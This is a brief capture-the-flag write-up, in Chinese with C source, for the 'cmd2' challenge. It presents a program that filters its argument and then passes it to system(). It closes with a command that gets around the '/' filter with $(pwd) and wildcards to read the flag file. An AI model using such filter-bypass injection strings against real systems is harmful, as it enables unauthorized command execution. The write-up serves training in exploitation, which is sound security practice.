PWNABLE——cmd2

#include 
#include 

int filter(char* cmd){
        int r=0;
        r += strstr(cmd, "=")!=0;
        r += strstr(cmd, "PATH")!=0;
        r += strstr(cmd, "export")!=0;
        r += strstr(cmd, "/")!=0;
        r += strstr(cmd, "`")!=0;
        r += strstr(cmd, "flag")!=0;
        return r;
}

extern char** environ;
void delete_env(){
        char** p;
        for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
        delete_env();
        putenv("PATH=/no_command_execution_until_you_become_a_hacker");
        if(filter(argv[1])) return 0;
        printf("%s\n", argv[1]);
        system( argv[1] );
        return 0;
}

本题关键在于绕过'/'的过滤，可以用$(pwd)这个环境变量绕过，结合通配符即可绕过。

cd /
echo $(pwd)  此时pwd为当前路径，即'/'
/home/cmd2/cmd2 '$(pwd)home$(pwd)cmd2$(pwd)fl?g'